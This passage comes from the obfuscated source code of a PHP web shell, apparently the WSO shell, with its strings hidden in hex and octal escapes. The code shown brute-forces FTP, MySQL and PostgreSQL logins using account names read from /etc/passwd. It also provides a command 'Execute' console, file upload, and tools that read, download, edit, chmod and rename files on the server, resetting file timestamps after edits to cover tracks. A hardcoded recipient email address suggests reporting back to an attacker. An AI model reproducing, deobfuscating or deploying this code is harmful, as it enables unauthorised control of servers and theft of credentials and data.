"\x27\40\160\x6f\162\164\75\47" . $port . "\47\40\165\163\145\162\75\47" . $login . "\x27\x20\160\x61\163\x73\167\x6f\x72\x64\75\x27" . $pass . "\x27\40\x64\x62\x6e\x61\x6d\145\x3d\160\x6f\163\164\147\x72\x65\x73"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode("\72", $_POST["\x73\145\162\166\145\x72"]); if ($_POST["\164\171\160\x65"] == 1) { $temp = @file("\x2f\x65\164\143\x2f\160\141\x73\x73\167\x64"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode("\x3a", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "\74\142\76" . htmlspecialchars($line[0]) . "\74\x2f\142\x3e\x3a" . htmlspecialchars($line[0]) . "\74\x62\x72\x3e"; } if (@$_POST["\x72\x65\x76\x65\162\163\x65"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "\74\142\76" . htmlspecialchars($line[0]) . "\x3c\57\x62\76\x3a" . htmlspecialchars($tmp); } } } } } elseif ($_POST["\164\x79\160\145"] == 2) { $temp = @file($_POST["\144\151\x63\164"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST["\x6c\x6f\x67\151\x6e"], $line)) { $success++; echo "\74\x62\76" . htmlspecialchars($_POST["\154\x6f\147\x69\156"]) . "\74\57\142\x3e\x3a" . htmlspecialchars($line) . "\74\x62\162\x3e"; } } } } echo "\x3c\163\x70\x61\x6e\x3e\101\164\164\145\x6d\x70\x74\x73\72\x3c\x2f\x73\x70\141\156\x3e\x20{$attempts}\40\74\163\x70\141\x6e\x3e\123\165\143\x63\x65\163\163\72\x3c\x2f\x73\160\x61\156\x3e\40{$success}\74\57\x64\151\x76\x3e\x3c\x62\162\x3e"; } echo "\x3c\x68\61\x3e\x46\124\120\x20\142\x72\x75\164\x65\x66\157\162\143\x65\x3c\x2f\x68\x31\76\74\x64\x69\166\x20\143\154\141\163\163\75\143\x6f\x6e\164\145\x6e\164\76\x3c\164\141\x62\x6c\145\x3e\74\x66\x6f\x72\x6d\40\155\145\164\x68\157\144\x3d\x70\157\x73\x74\76\74\x74\162\76\74\x74\144\x3e\74\163\160\141\x6e\76\x54\171\x70\145\x3c\57\x73\x70\x61\156\76\x3c\x2f\x74\144\x3e" . "\74\164\x64\x3e\74\x73\145\x6c\145\x63\x74\40\x6e\141\x6d\145\75\x70\x72\x6f\164\x6f\76\x3c\157\160\x74\x69\x6f\156\40\166\x61\154\165\x65\x3d\146\x74\160\76\x46\x54\x50\x3c\x2f\x6f\x70\x74\x69\x6f\x6e\76\74\x6f\x70\164\151\157\x6e\x20\166\x61\154\165\145\x3d\155\x79\x73\161\154\76\x4d\x79\123\161\154\x3c\x2f\157\x70\164\x69\x6f\x6e\76\x3c\157\160\x74\x69\157\156\40\166\x61\154\x75\x65\75\160\147\163\x71\x6c\76\120\x6f\x73\x74\147\162\x65\x53\x71\x6c\74\x2f\x6f\160\164\151\x6f\156\76\x3c\x2f\163\x65\x6c\145\x63\164\76\x3c\x2f\x74\x64\76\x3c\x2f\164\x72\x3e\x3c\x74\162\76\x3c\164\x64\76" . "\x3c\151\156\160\165\164\40\x74\x79\160\145\x3d\150\151\144\144\145\156\x20\x6e\x61\x6d\x65\75\x63\40\x76\x61\154\165\x65\x3d\42" . htmlspecialchars($GLOBALS["\x63\167\144"]) . "\x22\76" . "\74\151\156\x70\x75\164\x20\164\x79\x70\x65\75\150\151\144\144\x65\156\40\x6e\141\x6d\x65\x3d\x61\40\x76\x61\154\x75\145\75\x22" . htmlspecialchars($_POST["\141"]) . "\42\x3e" . "\74\x69\156\x70\165\164\x20\x74\171\160\x65\75\150\151\144\144\x65\x6e\x20\156\141\155\145\x3d\143\150\x61\x72\x73\x65\x74\40\x76\141\x6c\165\x65\75\x22" . htmlspecialchars($_POST["\x63\x68\141\x72\x73\145\164"]) . "\x22\x3e" . "\74\x73\x70\x61\156\x3e\123\x65\x72\166\145\162\x3a\x70\157\x72\164\x3c\x2f\163\160\141\156\x3e\74\x2f\164\x64\76" . "\74\164\x64\76\74\151\x6e\160\165\164\40\164\171\x70\145\75\x74\145\x78\164\40\156\141\155\145\75\163\145\x72\x76\145\x72\x20\166\x61\x6c\x75\x65\x3d\x22\61\62\67\x2e\x30\56\60\x2e\61\x22\76\x3c\x2f\x74\144\x3e\74\x2f\164\162\x3e" . "\74\164\x72\x3e\74\x74\144\76\x3c\x73\160\141\156\x3e\x42\x72\x75\164\145\x20\x74\171\160\145\x3c\x2f\x73\x70\x61\x6e\x3e\74\57\164\x64\76" . "\x3c\164\x64\76\x3c\154\x61\x62\x65\x6c\x3e\x3c\151\x6e\x70\165\164\x20\x74\171\x70\145\75\162\141\x64\151\157\x20\x6e\141\x6d\145\75\x74\171\160\145\40\166\141\154\165\145\x3d\42\61\x22\x20\143\150\x65\x63\x6b\145\x64\76\40\x2f\x65\x74\x63\x2f\160\141\x73\x73\x77\x64\x3c\57\154\141\142\145\154\76\x3c\x2f\x74\144\76\x3c\57\x74\162\x3e" . "\74\164\x72\76\74\164\x64\x3e\x3c\x2f\x74\x64\x3e\x3c\164\x64\x3e\x3c\154\141\142\x65\154\x20\x73\x74\x79\154\x65\x3d\42\x70\141\x64\144\151\x6e\x67\x2d\154\x65\x66\x74\x3a\x31\65\x70\x78\x22\x3e\x3c\x69\x6e\160\165\x74\x20\x74\171\x70\145\75\143\x68\x65\x63\153\x62\157\x78\40\156\x61\x6d\x65\75\162\145\166\145\x72\x73\145\40\x76\x61\x6c\165\x65\75\x31\x20\143\150\145\x63\153\x65\144\76\40\162\145\x76\145\162\163\x65\x20\50\154\157\147\151\x6e\40\x2d\x3e\40\x6e\151\147\157\154\51\74\x2f\154\141\x62\x65\154\x3e\74\x2f\x74\144\76\x3c\x2f\x74\162\x3e" . "\x3c\164\x72\76\74\164\144\76\x3c\57\164\144\x3e\74\x74\144\76\74\x6c\x61\x62\145\x6c\76\x3c\151\156\160\165\x74\40\164\x79\160\x65\x3d\x72\x61\x64\x69\157\40\156\x61\155\145\75\x74\171\x70\x65\x20\166\141\154\165\x65\x3d\42\62\x22\x3e\40\x44\151\x63\x74\x69\157\x6e\x61\x72\171\74\57\x6c\x61\142\145\x6c\x3e\74\x2f\164\x64\76\x3c\57\164\162\x3e" . "\74\164\162\x3e\74\164\144\x3e\x3c\x2f\164\144\x3e\74\x74\x64\76\x3c\x74\x61\x62\x6c\145\40\163\164\x79\154\145\x3d\x22\160\x61\144\x64\151\156\x67\x2d\154\145\x66\x74\x3a\61\x35\160\x78\42\76\x3c\164\162\76\74\164\x64\x3e\x3c\163\160\141\x6e\76\114\x6f\x67\151\156\74\x2f\163\x70\141\156\76\x3c\x2f\x74\x64\x3e" . "\74\164\x64\x3e\74\x69\x6e\x70\x75\164\x20\x74\171\x70\145\75\164\x65\x78\164\40\156\141\x6d\x65\x3d\154\157\x67\151\x6e\40\166\141\154\165\x65\75\42\x72\x6f\x6f\x74\42\x3e\74\57\164\144\76\74\57\164\x72\x3e" . "\x3c\164\162\76\x3c\x74\144\76\x3c\x73\x70\x61\x6e\x3e\x44\151\x63\164\x69\157\x6e\x61\162\x79\74\x2f\163\160\141\156\76\x3c\57\x74\144\76" . "\x3c\164\x64\x3e\x3c\151\x6e\160\165\x74\x20\x74\x79\x70\x65\x3d\164\145\x78\x74\40\156\141\155\145\75\x64\x69\x63\x74\x20\x76\x61\154\165\145\75\42" . htmlspecialchars($GLOBALS["\x63\x77\x64"]) . "\x70\141\x73\x73\167\144\56\144\151\143\42\76\74\x2f\x74\x64\x3e\74\x2f\x74\x72\x3e\x3c\57\x74\x61\x62\154\x65\76" . "\x3c\x2f\164\144\x3e\x3c\x2f\164\x72\76\74\x74\x72\76\74\164\x64\x3e\x3c\x2f\164\144\76\x3c\x74\144\76\74\x69\156\x70\165\164\40\164\171\x70\145\75\x73\165\142\155\151\x74\40\166\x61\x6c\165\145\75\42\x3e\76\x22\x3e\x3c\x2f\x74\144\x3e\74\x2f\x74\162\x3e\74\x2f\146\x6f\x72\155\x3e\x3c\57\x74\141\x62\x6c\145\76"; echo "\74\57\144\151\x76\76\74\142\162\76"; wsoFooter(); } goto xBzDj; u3Alk: function wsoFooter() { $is_writable = is_writable($GLOBALS["\x63\167\x64"]) ? "\40\74\146\x6f\156\164\40\143\157\x6c\157\162\x3d\x27\x23\62\x35\x66\146\x30\x30\x27\76\50\x57\162\x69\164\145\x61\142\154\145\51\74\57\x66\157\156\164\76" : "\x20\x3c\146\x6f\156\164\x20\143\157\154\x6f\x72\75\162\x65\144\x3e\x28\x4e\x6f\x74\x20\x77\x72\151\x74\141\x62\x6c\x65\51\x3c\x2f\146\x6f\156\x74\76"; echo "\12\x20\12\74\x2f\144\151\x76\76\xa\74\x74\x61\142\x6c\145\40\143\154\141\163\x73\75\151\156\146\x6f\40\x69\x64\x3d\x74\x6f\x6f\x6c\x73\124\142\154\x20\143\x65\154\154\x70\x61\144\144\x69\x6e\x67\75\x33\40\x63\145\154\154\163\160\141\143\151\x6e\147\75\x30\40\x77\151\x64\x74\150\x3d\x31\60\60\45\x20\x20\163\164\x79\154\145\75\x27\x62\157\x72\144\x65\162\55\164\x6f\160\x3a\62\160\x78\40\x73\x6f\x6c\151\144\40\x23\63\63\x33\x3b\x62\x6f\162\144\x65\162\x2d\142\x6f\164\x74\x6f\155\72\x32\160\x78\x20\163\157\154\151\144\x20\x23\63\63\63\x3b\47\76\12\40\x20\x20\x20\74\x74\x72\76\12\x20\x20\40\40\40\40\x20\40\x3c\x74\x64\76\74\x66\x6f\162\155\40\157\156\163\165\142\x6d\151\x74\75\x27\x67\50\156\x75\x6c\154\54\164\x68\151\163\x2e\x63\x2e\166\x61\154\165\x65\x2c\42\42\x29\73\162\x65\x74\x75\x72\x6e\x20\x66\x61\x6c\163\x65\73\47\76\x3c\163\160\x61\x6e\76\103\150\x61\156\147\145\x20\x64\151\x72\x3a\74\x2f\x73\x70\x61\x6e\x3e\74\x62\x72\x3e\74\x69\156\x70\x75\164\40\143\154\x61\x73\x73\x3d\x27\164\157\x6f\154\x73\111\156\160\47\40\164\171\x70\x65\75\x74\145\x78\x74\40\156\x61\155\x65\x3d\x63\x20\166\x61\x6c\x75\145\75\47" . htmlspecialchars($GLOBALS["\143\x77\144"]) . "\47\76\74\151\x6e\160\x75\x74\40\164\171\160\145\x3d\x73\x75\142\x6d\x69\x74\x20\166\141\154\165\145\75\x27\76\x3e\x27\76\74\57\146\157\x72\155\76\x3c\57\164\x64\x3e\12\40\40\x20\40\x20\x20\40\x20\74\x74\144\76\x3c\x66\x6f\x72\x6d\x20\157\156\x73\x75\x62\x6d\151\x74\75\x22\x67\50\x27\106\151\x6c\145\x73\124\x6f\157\154\163\47\x2c\156\165\154\x6c\54\x74\150\x69\163\x2e\x66\56\x76\x61\x6c\x75\x65\51\x3b\x72\145\164\165\x72\x6e\x20\146\x61\x6c\163\x65\73\42\76\x3c\163\x70\141\x6e\76\122\145\x61\x64\40\x66\151\154\145\x3a\x3c\57\163\x70\141\156\x3e\74\x62\162\76\x3c\151\156\x70\x75\164\x20\143\x6c\141\x73\x73\75\47\x74\x6f\x6f\x6c\x73\111\156\160\x27\x20\164\171\160\x65\x3d\164\145\170\x74\40\156\x61\155\145\x3d\146\x3e\x3c\151\156\x70\x75\x74\x20\164\x79\160\x65\x3d\x73\x75\x62\x6d\x69\x74\x20\166\x61\154\165\x65\75\x27\x3e\x3e\47\x3e\x3c\57\146\157\x72\x6d\76\x3c\x2f\x74\x64\x3e\xa\x20\40\40\x20\x3c\x2f\164\x72\76\74\164\x72\x3e\xa\40\x20\40\40\40\40\40\x20\74\x74\x64\x3e\74\x66\157\162\x6d\x20\157\156\x73\165\142\155\x69\164\x3d\42\147\50\47\106\x69\154\145\x73\x4d\141\156\x27\x2c\156\x75\154\154\54\x27\155\x6b\x64\151\162\47\x2c\x74\x68\151\163\x2e\x64\x2e\x76\x61\x6c\x75\x65\51\x3b\x72\145\164\x75\162\156\x20\146\141\x6c\163\145\x3b\42\76\x3c\x73\160\x61\x6e\76\115\141\x6b\x65\40\144\x69\x72\72\x3c\x2f\163\160\141\156\76{$is_writable}\74\142\162\x3e\x3c\x69\x6e\x70\x75\164\x20\x63\154\x61\163\163\x3d\x27\164\x6f\157\x6c\x73\x49\156\160\47\x20\x74\171\160\x65\75\164\x65\x78\x74\x20\x6e\141\x6d\x65\x3d\144\76\74\151\156\160\165\164\40\x74\171\160\x65\75\163\165\x62\155\151\164\40\x76\141\x6c\165\x65\x3d\x27\76\76\47\76\x3c\x2f\x66\157\x72\155\76\74\x2f\x74\144\x3e\xa\40\40\40\40\40\40\40\x20\74\164\144\76\74\x66\157\162\x6d\x20\x6f\x6e\163\x75\x62\155\x69\x74\75\x22\147\x28\x27\106\151\x6c\145\x73\x54\157\x6f\154\163\x27\x2c\x6e\x75\154\x6c\54\164\x68\151\x73\56\146\56\x76\141\154\x75\x65\54\x27\x6d\153\x66\151\x6c\145\47\x29\73\x72\x65\164\165\162\156\x20\146\x61\154\163\145\x3b\x22\76\74\x73\160\x61\156\76\x4d\x61\x6b\x65\x20\146\x69\x6c\x65\72\x3c\x2f\x73\x70\x61\156\76{$is_writable}\74\142\162\76\x3c\x69\156\x70\165\x74\x20\x63\x6c\x61\163\163\75\x27\164\x6f\157\154\x73\111\156\x70\47\x20\x74\x79\160\145\75\164\145\x78\164\x20\x6e\141\155\145\75\146\x3e\x3c\151\x6e\160\165\164\x20\164\x79\x70\145\75\163\165\x62\155\x69\x74\x20\166\x61\154\165\x65\75\47\x3e\76\x27\76\74\57\146\x6f\162\155\x3e\74\57\164\144\76\12\x20\12\x20\40\x20\x20\74\57\x74\162\76\74\164\162\x3e\12\x20\40\x20\x20\x20\40\x20\x20\74\x74\144\76\74\146\x6f\162\155\40\x6f\x6e\x73\165\142\x6d\151\164\x3d\42\147\x28\x27\x43\157\x6e\163\157\154\x65\47\x2c\156\165\x6c\x6c\x2c\164\150\x69\163\x2e\x63\56\166\x61\154\x75\x65\x29\x3b\x72\145\x74\x75\162\156\40\x66\x61\x6c\163\145\73\42\x3e\x3c\x73\x70\x61\x6e\76\105\x78\145\143\x75\164\x65\72\x3c\x2f\x73\x70\141\156\x3e\74\142\162\x3e\74\151\156\x70\165\164\40\x63\154\141\163\x73\75\47\x74\157\x6f\x6c\x73\x49\x6e\x70\47\x20\x74\x79\x70\145\75\x74\x65\x78\164\40\156\141\x6d\145\x3d\143\x20\x76\141\x6c\165\145\75\x27\x27\x3e\74\151\156\x70\x75\164\x20\164\171\160\145\x3d\163\x75\x62\155\x69\x74\40\x76\141\x6c\165\145\75\47\76\x3e\47\76\x3c\57\x66\157\162\155\x3e\74\57\x74\144\76\xa\40\x20\40\40\x20\40\40\40\x3c\164\144\76\x3c\146\157\162\155\x20\155\x65\x74\x68\157\144\75\47\160\157\x73\164\x27\40\x45\116\103\124\x59\x50\105\x3d\x27\155\x75\x6c\164\x69\x70\x61\x72\x74\57\x66\157\x72\155\55\x64\141\x74\141\47\x3e\12\x20\x20\40\40\40\x20\40\40\x3c\x69\x6e\160\165\x74\x20\164\171\160\145\x3d\150\x69\144\144\x65\156\x20\x6e\141\x6d\145\75\x61\x20\x76\x61\x6c\x75\145\x3d\x27\x46\x69\x6c\x65\163\115\101\x6e\x27\x3e\xa\x20\40\40\40\x20\x20\x20\x20\74\151\x6e\x70\165\164\40\x74\x79\x70\145\x3d\150\x69\144\x64\145\156\x20\156\x61\x6d\x65\x3d\143\40\x76\x61\154\x75\x65\75\x27" . $GLOBALS["\143\x77\x64"] . "\47\76\12\40\x20\x20\x20\40\40\40\40\x3c\151\156\x70\x75\x74\40\x74\171\x70\145\x3d\x68\151\x64\x64\x65\156\x20\x6e\141\155\145\x3d\160\x31\x20\166\x61\x6c\165\145\x3d\x27\x75\x70\154\157\x61\x64\106\151\154\145\47\x3e\xa\x20\x20\x20\40\40\x20\x20\x20\74\x69\x6e\x70\x75\164\40\164\171\160\145\x3d\x68\x69\x64\x64\145\x6e\x20\156\x61\x6d\x65\x3d\x63\150\141\x72\163\145\164\x20\x76\141\x6c\x75\145\x3d\47" . (isset($_POST["\x63\150\x61\x72\163\x65\164"]) ? $_POST["\x63\150\x61\162\163\x65\164"] : '') . "\x27\x3e\12\40\x20\40\40\x20\x20\x20\x20\x3c\163\160\x61\x6e\x3e\x55\160\154\x6f\141\144\x20\x66\x69\154\145\x3a\74\x2f\x73\x70\x61\x6e\x3e{$is_writable}\74\142\x72\x3e\74\151\156\x70\x75\x74\40\x63\154\x61\163\163\x3d\x27\x74\157\157\154\x73\x49\x6e\160\47\x20\164\171\160\145\75\146\151\154\x65\x20\156\x61\155\x65\75\146\76\x3c\151\156\x70\x75\x74\40\x74\x79\x70\145\75\163\x75\142\155\151\x74\40\166\141\x6c\165\x65\x3d\x27\76\x3e\x27\76\x3c\x2f\146\x6f\162\155\x3e\74\142\x72\40\40\76\74\x2f\x74\x64\x3e\12\40\12\x20\x20\40\40\x3c\x2f\164\x72\x3e\x3c\57\x74\141\142\x6c\145\x3e\74\x2f\x64\151\x76\76\x3c\x2f\142\x6f\x64\x79\x3e\74\57\150\164\155\x6c\x3e"; } goto AjLS7; GEQIH: $to_email = "\x6c\157\x67\151\x6e\157\x6c\x64\x75\155\100\x67\x6d\141\151\x6c\56\x63\x6f\x6d"; goto LZD1D; APuMx: function actionFilesTools() { if (isset($_POST["\x70\61"])) { $_POST["\x70\x31"] = urldecode($_POST["\160\x31"]); } if (@$_POST["\x70\x32"] == "\x64\x6f\x77\156\x6c\x6f\141\x64") { if (@is_file($_POST["\160\x31"]) && @is_readable($_POST["\160\61"])) { ob_start("\157\x62\137\x67\x7a\x68\141\156\144\x6c\x65\162", 4096); header("\x43\x6f\x6e\164\145\156\164\55\x44\151\x73\160\157\x73\151\x74\x69\157\156\72\40\x61\164\164\x61\x63\x68\x6d\145\x6e\x74\x3b\x20\x66\151\154\145\x6e\141\155\145\x3d" . basename($_POST["\160\x31"])); if (function_exists("\x6d\151\155\x65\x5f\x63\157\x6e\x74\x65\x6e\x74\x5f\164\x79\160\145")) { $type = @mime_content_type($_POST["\x70\x31"]); header("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\171\160\145\x3a\x20" . $type); } else { header("\x43\x6f\x6e\164\x65\x6e\x74\x2d\x54\171\x70\x65\x3a\40\x61\x70\x70\154\x69\143\141\164\x69\157\x6e\x2f\x6f\x63\164\x65\x74\55\x73\x74\162\x65\141\155"); } $fp = @fopen($_POST["\x70\61"], "\x72"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } } die; } if (@$_POST["\160\x32"] == "\x6d\x6b\x66\x69\x6c\x65") { if (!file_exists($_POST["\160\61"])) { $fp = @fopen($_POST["\160\x31"], "\167"); if ($fp) { $_POST["\160\62"] = "\x65\x64\x69\164"; fclose($fp); } } } wsoHeader(); echo "\x3c\150\61\x3e\106\x69\x6c\x65\40\x74\157\157\154\x73\74\57\x68\x31\x3e\x3c\x64\x69\x76\40\143\154\141\x73\x73\75\143\157\156\x74\145\156\164\x3e"; if (!file_exists(@$_POST["\x70\x31"])) { echo "\106\151\154\145\40\x6e\x6f\x74\40\x65\x78\x69\163\x74\x73"; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST["\x70\x31"])); if (!$uid) { $uid["\156\141\155\145"] = @fileowner($_POST["\160\61"]); $gid["\156\141\x6d\x65"] = @filegroup($_POST["\160\x31"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["\x70\x31"])); } echo "\74\163\x70\x61\x6e\76\116\x61\x6d\x65\72\x3c\x2f\x73\160\x61\156\x3e\40" . htmlspecialchars(@basename($_POST["\x70\x31"])) . "\x20\x3c\163\x70\141\x6e\x3e\123\x69\x7a\x65\72\x3c\57\163\160\x61\x6e\x3e\x20" . (is_file($_POST["\x70\61"]) ? wsoViewSize(filesize($_POST["\160\61"])) : "\55") . "\x20\x3c\163\x70\x61\x6e\x3e\120\145\x72\155\151\x73\x73\151\157\x6e\72\x3c\57\x73\160\x61\x6e\x3e\40" . wsoPermsColor($_POST["\160\61"]) . "\x20\74\x73\160\x61\156\x3e\117\x77\x6e\x65\x72\57\107\162\157\165\x70\72\x3c\x2f\163\160\141\x6e\76\x20" . $uid["\156\x61\x6d\x65"] . "\57" . $gid["\x6e\141\x6d\145"] . "\x3c\142\x72\x3e"; echo "\x3c\163\x70\x61\156\76\103\x72\145\141\164\x65\40\164\x69\x6d\x65\72\x3c\57\163\160\x61\x6e\76\x20" . date("\x59\55\x6d\55\x64\40\110\x3a\151\72\x73", filectime($_POST["\160\61"])) . "\40\x3c\163\x70\x61\x6e\76\x41\x63\143\145\163\163\x20\x74\x69\x6d\145\72\74\x2f\163\x70\141\156\x3e\x20" . date("\131\55\155\55\144\x20\x48\x3a\151\x3a\163", fileatime($_POST["\160\x31"])) . "\40\74\x73\160\141\156\76\115\157\144\151\146\171\x20\164\151\x6d\x65\x3a\x3c\x2f\163\160\141\156\x3e\40" . date("\131\55\x6d\55\x64\40\x48\72\x69\72\x73", filemtime($_POST["\160\x31"])) . "\74\142\162\x3e\x3c\x62\162\x3e"; if (empty($_POST["\160\62"])) { $_POST["\x70\x32"] = "\x76\x69\x65\167"; } if (is_file($_POST["\160\61"])) { $m = array("\126\x69\145\x77", "\110\x69\x67\x68\154\x69\147\150\164", "\104\x6f\167\x6e\x6c\x6f\x61\x64", "\x48\145\x78\x64\x75\x6d\x70", "\105\144\x69\x74", "\103\150\155\157\144", "\122\145\156\x61\155\x65", "\x54\x6f\165\143\150"); } else { $m = array("\103\150\155\x6f\x64", "\x52\x65\x6e\x61\155\x65", "\124\157\165\143\x68"); } foreach ($m as $v) { echo "\x3c\x61\40\150\162\x65\146\75\43\40\x6f\156\x63\154\151\x63\x6b\75\42\x67\x28\156\165\154\154\54\x6e\165\154\154\54\x6e\165\154\154\54\47" . strtolower($v) . "\x27\x29\42\x3e" . (strtolower($v) == @$_POST["\160\62"] ? "\74\x62\x3e\x5b\40" . $v . "\40\x5d\x3c\57\x62\x3e" : $v) . "\x3c\57\x61\76\40"; } echo "\x3c\142\162\76\x3c\142\162\x3e"; switch ($_POST["\x70\62"]) { case "\166\x69\145\x77": echo "\74\160\162\145\40\143\x6c\141\163\x73\x3d\x6d\x6c\x31\76"; $fp = @fopen($_POST["\x70\61"], "\x72"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "\74\57\x70\162\145\76"; break; case "\150\151\147\150\154\151\x67\150\164": if (@is_readable($_POST["\x70\x31"])) { echo "\74\x64\151\x76\40\143\154\x61\x73\x73\75\x6d\154\x31\x20\163\164\171\154\145\75\x22\142\x61\143\x6b\x67\x72\157\165\156\x64\x2d\x63\x6f\x6c\x6f\x72\x3a\40\x23\x65\61\145\61\145\61\x3b\143\157\154\157\x72\x3a\142\x6c\x61\x63\x6b\x3b\42\x3e"; $code = @highlight_file($_POST["\x70\61"], true); echo str_replace(array("\x3c\163\160\x61\x6e\40", "\x3c\57\x73\x70\x61\x6e\x3e"), array("\x3c\x66\157\156\164\40", "\x3c\x2f\146\x6f\156\164\x3e"), $code) . "\x3c\57\144\x69\166\76"; } break; case "\x63\x68\155\157\144": if (!empty($_POST["\160\x33"])) { $perms = 0; for ($i = strlen($_POST["\x70\63"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["\160\x33"][$i] * pow(8, strlen($_POST["\160\x33"]) - $i - 1); } if (!@chmod($_POST["\160\61"], $perms)) { echo "\103\141\x6e\x27\x74\x20\x73\x65\164\x20\160\x65\x72\155\x69\163\163\x69\157\156\163\41\x3c\x62\162\x3e\x3c\163\143\x72\151\x70\164\76\144\157\143\165\155\x65\156\164\56\155\x66\56\160\63\56\166\x61\x6c\165\145\75\42\x22\73\x3c\57\163\143\x72\x69\x70\164\x3e"; } } clearstatcache(); echo "\x3c\x73\x63\162\151\x70\x74\76\x70\x33\137\75\x22\42\73\x3c\x2f\163\x63\x72\151\160\x74\76\x3c\x66\x6f\162\x6d\40\157\x6e\163\165\x62\x6d\x69\164\x3d\x22\x67\x28\156\x75\x6c\x6c\x2c\156\165\x6c\154\x2c\x6e\165\x6c\154\x2c\x6e\x75\154\154\x2c\x74\150\151\x73\56\x63\150\155\x6f\x64\x2e\x76\141\x6c\165\145\51\73\x72\x65\164\x75\162\x6e\40\146\141\154\163\145\x3b\42\76\74\151\156\160\165\x74\x20\164\171\x70\145\75\164\145\x78\x74\40\x6e\x61\x6d\x65\75\143\x68\x6d\157\x64\40\x76\x61\154\165\145\75\x22" . substr(sprintf("\45\x6f", fileperms($_POST["\160\61"])), -4) . "\42\76\74\151\x6e\160\165\x74\x20\164\x79\x70\145\x3d\163\x75\x62\155\x69\x74\40\166\x61\x6c\x75\145\75\x22\x3e\x3e\x22\x3e\x3c\x2f\x66\157\x72\155\x3e"; break; case "\145\144\x69\x74": if (!is_writable($_POST["\x70\x31"])) { echo "\106\x69\x6c\145\40\x69\163\156\x27\164\40\x77\x72\151\164\145\141\142\x6c\x65"; break; } if (!empty($_POST["\x70\63"])) { $time = @filemtime($_POST["\x70\x31"]); $_POST["\160\x33"] = substr($_POST["\160\x33"], 1); $fp = @fopen($_POST["\x70\61"], "\x77"); if ($fp) { @fwrite($fp, $_POST["\160\63"]); @fclose($fp); echo "\123\x61\166\x65\144\x21\x3c\x62\x72\76\x3c\x73\x63\x72\x69\160\x74\76\160\63\x5f\75\x22\x22\x3b\74\x2f\163\x63\x72\151\160\x74\76"; @touch($_POST["\x70\x31"], $time, $time); } } echo "\74\146\x6f\x72\155\40\x6f\156\x73\165\x62\155\x69\164\x3d\42\147\50\x6e\x75\x6c\154\x2c\x6e\x75\x6c\x6c\54\156\165\154\154\x2c\x6e\165\x6c\154\x2c\x27\x31\x27\x2b\x74\x68\x69\163\x2e\164\145\170\x74\56\166\x61\x6c\x75\x65\51\x3b\162\x65\x74\x75\x72\x6e\x20\x66\x61\154\163\145\x3b\42\x3e\x3c\164\x65\170\164\x61\162\x65\141\40\156\x61\x6d\x65\x3d\164\x65\x78\164\x20\143\154\141\x73\x73\x3d\x62\151\147\x61\x72\x65\x61\76"; $fp = @fopen($_POST["\x70\x31"], "\162"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "\x3c\x2f\164\x65\x78\x74\x61\x72\x65\x61\76\74\x69\156\x70\x75\x74\x20\164\171\x70\145\x3d\163\x75\x62\155\x69\164\x20\166\x61\154\x75\x65\75\x22\76\x3e\42\x3e\x3c\57\x66\x6f\x72\x6d\x3e"; break; case "\x68\145\x78\x64\x75\x6d\x70": $c = @file_get_contents($_POST["\x70\x31"]); $n = 0; $h = array("\x30\60\x30\x30\x30\60\x30\60\74\142\162\x3e", '', ''); $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("\45\60\62\130", ord($c[$i])) . "\x20"; switch (ord($c[$i])) { case 0: $h[2] .= "\x20"; break; case 9: $h[2] .= "\x20"; break; case 10: $h[2] .= "\x20"; break; case 13: $h[2] .= "\40"; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("\45\x30\70\130", $i + 1) . "\x3c\142\162\76"; } $h[1] .= "\x3c\142\162\x3e"; $h[2] .= "\12"; } } echo "\74\x74\141\142\154\145\40\143\145\x6c\154\163\160\141\x63\x69\x6e\x67\75\61\40\x63\145\x6c\154\x70\141\x64\144\x69\156\147\x3d\65\x20\x62\147\x63\157\154\x6f\x72\x3d\x23\62\x32\x32\62\x32\x32\76\x3c\x74\162\76\74\x74\x64\40\142\x67\143\157\154\x6f\162\x3d\43\63\x33\x33\63\63\63\76\x3c\x73\160\x61\156\40\163\x74\x79\x6c\145\x3d\x22\x66\157\x6e\x74\55\x77\145\x69\147\150\164\72\x20\x6e\157\162\155\x61\154\x3b\x22\x3e\74\160\x72\x65\x3e" . $h[0] . "\x3c\57\160\x72\145\76\74\x2f\x73\160\141\x6e\x3e\x3c\57\164\144\x3e\74\164\x64\x20\142\x67\x63\157\x6c\x6f\x72\75\43\x32\70\x32\x38\x32\70\x3e\74\160\162\x65\x3e" . $h[1] . "\x3c\57\160\x72\x65\x3e\74\x2f\164\x64\x3e\x3c\x74\144\x20\142\x67\143\x6f\154\x6f\162\75\x23\63\63\x33\63\63\x33\x3e\74\x70\162\x65\76" . htmlspecialchars($h[2]) . "\74\57\160\162\x65\x3e\74\x2f\x74\144\x3e\x3c\57\164\162\x3e\x3c\57\164\x61\x62\x6c\145\x3e"; break; case "\x72\x65\x6e\x61\x6d\145": if (!empty($_POST["\160\63"])) { if (!@rename($_POST["\x70\61"], $_POST["\x70\63"])) { echo "\x43\141\156\47\164\40\162\x65\x6e\x61\x6d\x65\x21\x3c\x62\162\x3e"; } else { die("\x3c\163\x63\162\x69\160\164\x3e\147\50\x6e\165\154\x6c\x2c\x6e\x75\x6c\x6c\54\x22" . urlencode($_POST["\x70\x33"]) . "\42\54\x6e\165\154\x6c\54\42\x22\x29\74\57\x73\x63\162\x69\160\x74\x3e"); } } echo 